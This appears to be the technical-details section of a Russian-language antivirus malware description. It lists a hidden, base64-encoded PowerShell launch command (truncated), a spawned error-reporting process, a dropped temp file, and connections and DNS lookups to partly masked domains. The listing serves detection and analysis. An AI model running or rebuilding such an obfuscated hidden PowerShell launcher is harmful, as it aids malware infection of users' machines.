Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABEAGgAcABzAHQAZwB5AHkAaABxAGYAcwB4AD0AJwBXAGUAagBlAHQAYQBoAHMAawBuAGgAcwBnACcAOwAkAFEAbABsAHoAdwBxAHcAaQBjAHoAIAA9ACAAJwAzADMANQAnADsAJABRAGcAYQBnAHcAdgBmAHg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1452
- %TEMP%\1053786.cvr
- 'be##nne.com':443
- 'be##nne.com':443
- DNS ASK zp###yshop.com
- DNS ASK sa#######rreetpaulyenawa.com
- DNS ASK be##nne.com
- DNS ASK sh###azan.com
- DNS ASK ag###veta.com